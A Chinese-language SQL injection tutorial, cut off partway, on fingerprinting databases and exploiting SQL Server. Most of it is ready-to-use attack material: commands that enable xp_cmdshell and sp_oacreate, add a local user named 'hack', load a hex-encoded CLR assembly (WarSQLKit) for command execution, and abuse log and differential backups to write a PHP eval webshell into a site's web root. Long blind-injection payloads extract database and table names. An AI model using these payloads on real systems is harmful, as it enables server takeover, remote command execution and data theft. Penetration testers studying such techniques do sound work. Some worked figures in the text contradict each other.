• MySQL&SQL server&Oracle&Access&PostgreSQL数据库sql注入详解


    判断数据库的类型

    当我们通过一些测试,发现存在SQL注入之后,首先要做的就是判断数据库的类型。

    常用的数据库有MySQL、Access、SQLServer、Oracle、PostgreSQL。虽然绝大多数数据库的大部分SQL语句都类似,但是每个数据库还是有自己特殊的表的。通过表我们可以分辨是哪些数据库。

    MySQL数据库的特有的表是 information_schema.tables , access数据库特有的表是 msysobjects ,SQLServer 数据库特有的表是 sysobjects ,oracle数据库特有的表是 dual。那么,我们就可以用如下的语句判断数据库。哪个页面正常显示,就属于哪个数据库

     

    或者也可以通过查询版本来确定:

    MySQL数据库注入

    MySQL是 最熟悉的 ,就不展开了。

    详细的注入和绕过可以参考:https://xz.aliyun.com/t/7169 写的挺好

    SQLServer数据库注入

    判断当前用户权限

    SQLServer有三个权限级别:

    1. sa权限:数据库操作,文件管理,命令执行,注册表读取等system。SQLServer数据库的最高权限
    2. db权限:文件管理,数据库操作等权限 users-administrators
    3. public权限:数据库操作 guest-users

    判断是否是SA权限

    select is_srvrolemember('sysadmin')

    判断是否是db_owner权限

    select is_member('db_owner')

    判断是否是public权限

    select is_srvrolemember('public')

    SQLServer数据库有6个默认的库,分别是4个系统数据库:master 、model 、msdb 、tempdb,和2个实例数据库:ReportServer、ReportServerTempDB。其中,系统数据库 model 和 tempdb 默认是没有数据表的。

    1. master数据库:master数据库控制SQL Server的所有方面。这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息。
    2. model数据库:model数据库是建立所有用户数据库时的模板。当你建立一个新数据库时,SQL Server会把model数据库中的所有对象建立一份拷贝并移到新数据库中。在模板对象被拷贝到新的用户数据库中之后,该数据库的所有多余空间都将被空页填满。
    3. msdb数据库:msdb数据库是SQL Server中的一个特例。如果你查看这个数据库的实际定义,会发现它其实是一个用户数据库。不同之处是SQL Server拿这个数据库来做什么。所有的任务调度、报警、操作员都存储在msdb数据库中。该库的另一个功能是用来存储所有备份历史。SQL Server Agent将会使用这个库。
    4. tempdb数据库:tempdb数据库是一个非常特殊的数据库,供所有来访问你的SQL Server的用户使用。这个库用来保存所有的临时表、存储过程和其他SQL Server建立的临时用的东西。例如,排序时要用到tempdb数据库。数据被放进tempdb数据库,排完序后再把结果返回给用户。每次SQL Server重新启动,它都会清空tempdb数据库并重建。永远不要在tempdb数据库建立需要永久保存的表。

    但是如果用navicat远程连接的话,只会显示2个实例数据库:ReportServer、ReportServerTempDB

    SQLServer数据库的查询语句

    #常用语句

    select @@version;       #查询数据库的版本

    select @@servername;    #查询服务名

    select host_name();     #查询主机名,如果是用navicat远程连接的话,主机名是本地的名字

    select db_name();       #查询当前数据库名

    select db_name(1);      #查询第一个数据库名

    select db_name(2);      #查询第二个数据库名

    select user;            #查询当前数据库的拥有者,结果为 dbodbo是每个数据库的默认用户,具有所有者权限,全称:datebaseOwner ,即DbOwner

    use tempdb              #切换到tempdb 

    top n                   #查询前n条记录

    limit 2,3               #查询第2条开始的3条数据,也就是2,3,4

    select substring('string',2,1)     #截取给定字符串的索引为2的1个字符

    select ascii('a')                  #查询给定字符串的ascii值

    select len('string')               #查询给定字符串的长度

    EXEC sp_spaceused @updateusage = N'TRUE';  #查询当前数据库的大小

    sp_spaceused '表名'                #查询指定表名的大小

    #数据库的连接

    server=127.0.0.1;UID=sa;PWD=123456;database=master;Provider=SQLOLEDB

    mssql://sa:123456@127.0.0.1/XCCMS_SocialBusinessDB

    #查询数据库

    count(name)是查询总数

    name是查询名字

    *是查询详细信息

    select count(name) from sysdatabases     #查询数据库的个数,只有当前数据库是master的时候,才能执行该命令

    select name  from sysdatabases           #查询数据库的名字

    select * from sysdatabases               #查询所有数据库的信息

    #查询数据表

    select count(name) from sysobjects where type='U' #查询当前数据库中表的个数

    select name from sysobjects where type='U'  #查询当前数据库中所有表的名字

    select * from sysobjects where type='U'    #查询当前数据库的所有表的详细信息

    select count(name) from test..sysobjects where xtype='U'  #查询指定test数据库中表的个数

    select name from test..sysobjects where xtype='U'         #查询指定test数据库中表的名字

    select * from test..sysobjects where xtype='U'            #查询指定test数据库中表的详细信息

    #查询列

    select count(name) from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')            #查询当前数据库的指定users表的列的个数

    select name from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')         #查询当前数据库的指定users表的所有列的名字

    select * from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')      #查询当前数据库的指定users表的列的详细信息

    select count(name) from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')     #查询指定test数据库的指定users表的列的个数

    select name from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #查询指定test数据库的指定users表的所有列的名字

    select * from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #查询指定test数据库的指定users表的列的详细信息

    #查询数据

    select count(*) from test..users          #查询test数据库user表的数据的条数

    select * from test..users                 #查询test数据库user表的所有数据

    SA权限开启xp_cmdshell获取主机权限

    判断xp_cmdshell状态

    我们可以在master.dbo.sysobjects中查看xp_cmdshell状态

    只用判断存在,利用count(*)即可。

    select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

    xtype为对象类型,xtype='x'这里表示xp_cmdshell的对象类型为扩展存储过程。

    存在即返回1

    启用xp_cmdshell

    如果xp_cmdshell权限没开启的话,我们可以利用EXEC启用xp_cmdshell

    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

    也可以用如下语句:

    execute('sp_configure "show advanced options",1')  #将该选项的值设置为1

    execute('reconfigure')                             #保存设置

    execute('sp_configure "xp_cmdshell", 1')           #xp_cmdshell的值设置为1

    execute('reconfigure')                             #保存设置

    利用xp_cmdshell执行命令

    通过xp_cmdshell执行系统命令指令如下: (master.. 可以不加)

    exec master..xp_cmdshell 'whoami'

    利用xp_cmdshell写文件

    先利用 dir 找到web服务根目录

    exec master..xp_cmdshell 'dir'

    然后通过 echo 将一句话木马写入文件,即可连webshell

    exec xp_cmdshell 'echo test>d:\1.txt'

    恢复被删除的xp_cmdshell

    我们可以利用xplog70.dll恢复被删除的xp_cmdshell

    Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

    SA权限使用sp_oacreate执行系统命令

    使用sp_oacreate提权前提条件:

    SQLServer数据库服务未降权 (因为需要调用COM组件)

    我们可以借助SQLServer中的COM组件SP_OACREATE来执行系统命令,使用下面命令查看是否可使用 sp_oacreate 执行系统命令:

    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

    如果SQLServer 阻止了对组件 ‘Ole Automation Procedures’ 的过程 ‘sys.sp_OACreate’ 的访问,可以使用以下命令打开:

    EXEC sp_configure 'show advanced options', 1; 

    RECONFIGURE WITH OVERRIDE; 

    EXEC sp_configure 'Ole Automation Procedures', 1; 

    RECONFIGURE WITH OVERRIDE; 

    再次执行命令,发现不报错。此时可以执行系统命令了,但是使用 sp_oacreate 执行系统命令不回显:


    于是我们可以使用以下命令创建用户hack:

    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user hack Password@ /add'

    SA权限使用CLR执行系统命令

    #启用MSSQL CLR功能

    exec sp_configure 'show advanced options', 1;

    RECONFIGURE;

    Exec sp_configure 'clr enabled', 1;

    RECONFIGURE;

    #为了导入了不安全的程序集,我们还需要将数据库标记为安全。

    ALTER DATABASE [master] SET TRUSTWORTHY ON;

    #导入程序集,单独执行

    CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;

    #创建存储过程,单独执行

    CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

    #执行命令

    EXEC sp_cmdExec 'whoami';

    #删除该程序集

    DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];

    DB_owner权限LOG备份Getshell

    无论是LOG备份还是差异备份,都是利用备份的过程中写入一句话木马

    SQLServer常见的备份策略:

    1. 每周一次完整备份
    2. 每天一次差异备份
    3. 每小时一次事务日志备份

    利用前提:

    1. 目标机器存在数据库备份文件 ,也就是如下,我们利用test数据库的话,则需要该test数据库存在数据库备份文件
    2. 知道网站的绝对路径
    3. 该注入支持堆叠注入

    具体操作:

    alter database 数据库名 set RECOVERY FULL;   #修改数据库恢复模式为 完整模式

    create table cmd (a image);        #创建一张表cmd,只有一个列 a,类型为image

    backup log 数据库名 to disk= 'C:\phpstudy\WWW\1.php' with init;   #备份表到指定路径

    insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);  #插入一句话到cmd表里

    backup log 数据库名 to disk='C:\phpstudy\WWW\2.php';   #把操作日志备份到指定文件

    drop table cmd;    #删除cmd

    第四行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句话木马 <?php @eval($_POST[x]);?> 的16进制表示

         会在目标网站根目录下生成1.php和2.php文件,其中1.php 保存数据库,2.php就是我们需要连接的木马文件。

    DB_owner权限差异备份Getshell

    注:差异备份有概率会把网站搞崩,所以不建议使用差异备份

    利用前提:

    1. 知道网站的绝对路径  C:phpstudyWWW
    2. 该注入支持堆叠注入

    注:以下语句一条一条执行

    create table [dbo].[test] ([cmd] [image])

    declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x786965 backup log @a to disk = @s with init,no_truncate

    insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)

    declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate

    Drop table [test]

    1. 这里第二行的 0x786965,是字符 xie 的16进制表示,这里随便填都可以
    2. 第三行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句话木马 <?php @eval($_POST[x]);?> 的16进制表示
    3. 第四行的0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000是  C:\phpstudy\WWW\shell.php 的16进制表示

    然后会在目标网站根目录下生成shell.php木马文件

    盲注SQLServer数据库

    判断当前数据库用户权限

    and 1=(IS_SRVROLEMEMBER('sysadmin'))        //返回正常为sa

    and 1=(IS_MEMBER('db_owner'))               //返回正常为DB_OWNER

    and 1=(IS_srvrolemember('public'))          //public权限,较低

    如果当前用户是sa,则执行三个都正常显示。如果是db_owner,则执行sa不正常显示,执行public正常显示。如果是public,则只执行public才正常显示

    判断xp_cmdshell是否存在

    and 1=(Select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 

    正常显示,说明已开启。如果不存在,则需要开启。

    如果开启后,想要通过xp_cmdshell执行系统命令,需要该注入点存在堆叠注入

    判断数据库的个数

    and (select count(name) from master..sysdatabases)=N

    由图可知,有7个数据库

    判断dbid个数,一般数据库有多少个,dbid的值就为多少

    and (select count(*) from master..sysdatabases where dbid=N)=1

    通过dbid得到所有数据库名

    当使用上一条命令不能执行时,可以使用下面的命令,查询数据库的个数,以及每个数据库的名字

    判断dbid数据库的长度,由以下得知dbid为1数据库的长度是8

    and len(db_name(1))>5         //正常显示

    and len(db_name(1))>6         //不正常显示

    大于5正常显示,大于6不正常显示,所以第一个数据库长度是6,即

    一般来说,查的前6个数据库就是自带的那6个数据库,第7个开始才是我们自己建的

    and len(db_name(7))>3         //正常显示

    and len(db_name(7))>4         //不正常显示

    大于3正常显示,大于4不正常显示,所以第7个数据库名的长度为4

    判断dbid为7数据库字符的ascii值

    and ascii(substring(db_name(7),1,1))>100   //正常显示

    and ascii(substring(db_name(7),1,1))>150   //不正常显示

    and ascii(substring(db_name(7),1,1))>125   //不正常显示

    and ascii(substring(db_name(7),1,1))>112   //正常显示

    and ascii(substring(db_name(7),1,1))>118   //不正常显示

    and ascii(substring(db_name(7),1,1))>115   //正常显示

    and ascii(substring(db_name(7),1,1))>116   //不正常显示

    大于115正常显示,大于116不正常显示,所以第七个数据库的第一个字符的ascii值为116,对应的字符是t

    以此类推,数据库的第二个字符为  and ascii(substring(db_name(7),2,1))>100

             数据库的第三个字符为:and ascii(substring(db_name(7),3,1))>100

             数据库的第三个字符为:and ascii(substring(db_name(7),4,1))>100

    最后得到第7个数据库名为:test

    判断当前数据库名

    判断数据库的长度,由以下得知数据库的长度是8

    and len(db_name())>3         //正常显示

    and len(db_name())>4         //不正常显示

    大于3正常显示,大于4不正常显示,所以数据库名的长度为4

    判断数据库字符的ascii值,用二分法

    and ascii(substring(db_name(),1,1))>100   //正常显示

    and ascii(substring(db_name(),1,1))>150   //不正常显示

    and ascii(substring(db_name(),1,1))>125   //不正常显示

    and ascii(substring(db_name(),1,1))>112   //正常显示

    and ascii(substring(db_name(),1,1))>118   //不正常显示

    and ascii(substring(db_name(),1,1))>115   //正常显示

    and ascii(substring(db_name(),1,1))>116   //不正常显示

    大于115正常显示,大于116不正常显示,所以数据库第一个字符的ascii值为116,对应的字符是t

    以此类推,数据库的第二个字符为  and ascii(substring(db_name(),2,1))>100

             数据库的第三个字符为:and ascii(substring(db_name(),3,1))>100

             数据库的第三个字符为:and ascii(substring(db_name(),4,1))>100

            

    最后得到数据库名为:test

    爆破test数据库中表的个数

    and (select count(name) from test..sysobjects where xtype='U')>0   正常显示

    and (select count(name) from test..sysobjects where xtype='U')>1   不正常显示

    所以test数据库只有一个表

    爆破test数据库中表

    这里爆破表的时候,不能爆破表名的长度,所以只能爆破表名的一个一个字符。当爆破到第某个字符出现其ascii值>0都不正常显示时,说明这个字符位不存在,所以到前一位为止。注意,这里爆破得到的表名有 dbo.

    第一个表的第一个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N

    第一个表的第二个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N

    第一个表的第三个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N

    ......

    当爆破到第10个字符的时候,发现>0都不正常显示,说明不存在第10位

    爆破得到表名为:dbo.users

    如果有第二个表,第三个表...

    爆破第二个表的第一个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N

    爆破第二个表的第二个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N

    爆破第二个表的第三个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N

    ......

    爆破第三个表的第一个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N

    爆破第三个表的第二个字符的ascii值:

    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N

    爆破第三个表的第三个字符的ascii值:

